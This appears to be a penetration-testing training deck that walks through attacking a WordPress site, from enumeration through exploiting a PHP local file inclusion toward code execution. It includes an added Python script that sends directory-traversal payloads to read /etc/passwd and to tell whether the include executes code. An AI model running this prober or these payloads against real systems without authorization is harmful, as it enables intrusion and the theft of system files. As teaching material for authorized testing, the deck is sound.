
Introduction to Penetration Testing

Table of Contents

Overview
Enumeration
Tool Output
Do We Stop Here?
Custom Scripts
Wpscan
Online Research
Testing Exploitation
PHP LFI
Code Execution, Yes Please!

Overview
This session will cover the mindset I follow when approaching a web application
I am going to show where many might stop, and what happens when you push further
These types of techniques can be applied to any web application

Overview Cont.
Tools Leveraged:

Nmap
Whatweb
Wpscan
Wget
Custom scripts
Burp Suite
Netcat
Google

Methodology Overview
Pre-Engagement Activities
Hammer out all the details to conduct the test (Schedule, Scoping, Rules of Engagement, Formal Permission, etc.)

Information Gathering and Reconnaissance
Depends on type of test and information you are given (Organization name, CIDR, list of URLs, source code, etc.)

Automated Testing
Manual Testing and Validation
Reporting
Remediation Support

Methodologies Cont.
Penetration Testing Execution Standard (PTES):
http://www.pentest-standard.org/index.php/Main_Page

Mindset is Key
Think like an attacker and see things through a different lens:
Upload an avatar? Hmmm, add code?
Download a report? Hmm, directory traversal for another file?

Confidence
Without it you'll very easily hit a wall and stop
I tell myself: a vulnerability is here, I just need to find it

Enumeration
Nmap:

WhatWeb:

Do We Stop Here?
Hmmm?

Custom Scripts
Web application testing requires custom scripting. There is really no way around it:

Custom Scripts Cont.
Making web requests with a scripting language isn't too difficult
Check out tutorials online and try to automate web requests
Making a tool for CVE-2012-1823 (the php-cgi query-string argument injection) is a good use case because you need to make a POST request and modify several header values
If you can write a tool for this CVE, it demonstrates concepts that can be applied to many different CVEs

Wpscan
Wpscan:

Wpscan
Do we stop here?

Wpscan: Plugin Enumeration
Wpscan: --enumerate p

Online Research

Online Research Cont.
Hmm, our web server doesn't respond when we request /wordpress/wp/wp-content/
Do we stop here?

Testing Exploitation
Yeah, let's grab /etc/passwd

PHP LFI
Cool, so we can LFI, do we stop now?

PHP LFI: Now What?
What can be done with a PHP LFI?
It depends on which function is behind the LFI vulnerability (include(), readfile(), etc.)
PHP functions like include() and require() will execute any PHP code in the included file
Yay, code execution through PHP snippets!
PHP functions like readfile() and file_get_contents() only return the file's contents; nothing in it is executed
We have more work to do
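Added example (not from the original deck), covering both the "Testing Exploitation" step (grabbing /etc/passwd) and the question above (which function is behind the include). The pure helpers build traversal payloads, recognise a real passwd file in a response, and classify the response to fetching a file known to contain PHP tags: tags in the output means a readfile()-style sink (disclosure only), no tags means an include()-style sink that executes what it loads. The target URL, parameter name and probe file path are assumptions; the HTTP part only runs when the file is executed as a script.

```python
"""LFI probing helpers: grab /etc/passwd, then work out which PHP function
sits behind the include so you know whether code execution is on the table.
"""
import re
import urllib.parse
import urllib.request

# Proof-of-LFI marker: the root line of /etc/passwd (not just an echo of our payload).
PASSWD_RE = re.compile(r"^root:[^:]*:0:0:", re.MULTILINE)


def build_traversal_payloads(target="/etc/passwd", max_depth=6):
    """Absolute path first, then ../ climbs of increasing depth.

    Absolute works when the app does include($_GET['page']) unchanged; traversal
    is needed when it prefixes a directory, e.g. include('pages/' . $_GET['page']).
    """
    rel = target.lstrip("/")
    return [target] + ["../" * n + rel for n in range(1, max_depth + 1)]


def looks_like_passwd(body):
    """True when the response carries a real passwd file."""
    return PASSWD_RE.search(body) is not None


def classify_php_probe(body):
    """Classify the response to loading a file that is known to contain PHP tags.

    readfile()/file_get_contents()/fpassthru() return the source verbatim, so the
    tags survive -> 'readfile-like' (disclosure only).  include()/require() execute
    the file, so the tags never reach the client -> 'include-like' (a file you can
    write to, or a wrapper the sink accepts, now means code execution).
    """
    return "readfile-like" if re.search(r"<\?(php|=)", body) else "include-like"


def swap_target(hit, old_target, new_target):
    """Keep the traversal prefix that worked and point it at a different file."""
    old_rel = old_target.lstrip("/")
    if not hit.endswith(old_rel):
        raise ValueError("payload does not end with the original target")
    return hit[: len(hit) - len(old_rel)] + new_target.lstrip("/")


def probe(base_url, param, payload, timeout=10):
    """GET base_url?param=payload (slashes left unencoded) and return the body."""
    url = f"{base_url}?{param}={urllib.parse.quote(payload, safe='/:')}"
    with urllib.request.urlopen(url, timeout=timeout) as r:
        return r.read().decode(errors="replace")


def find_lfi(base_url, param, target="/etc/passwd", max_depth=6):
    """Return the first payload that yields /etc/passwd, or None."""
    for p in build_traversal_payloads(target, max_depth):
        if looks_like_passwd(probe(base_url, param, p)):
            return p
    return None


if __name__ == "__main__":
    # Hypothetical target, parameter and probe file; adjust to the app under test.
    BASE = "http://target.example/wordpress/index.php"
    PARAM = "page"
    # Pick a file that contains PHP tags but prints nothing when executed, so the
    # two outcomes are unambiguous.  WordPress's wp-includes/version.php only
    # assigns variables; the document root here is an assumption.
    PHP_PROBE = "/var/www/html/wordpress/wp-includes/version.php"
    hit = find_lfi(BASE, PARAM)
    print("working payload:", hit)
    if hit:
        verdict = classify_php_probe(probe(BASE, PARAM, swap_target(hit, "/etc/passwd", PHP_PROBE)))
        print("sink is", verdict)
```

Do not point the probe at the vulnerable script itself: an include()-style sink would include it recursively and crash the request instead of answering the question.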

Code Execution? Yes, Please!

Code Execution? Yes, Please!
Request:

Demo

Summary
Tools may not give you the answer
Very easy to hit a hurdle and quit
You need to be curious/creative and constantly push to get more information
Confidence and mindset go a long way
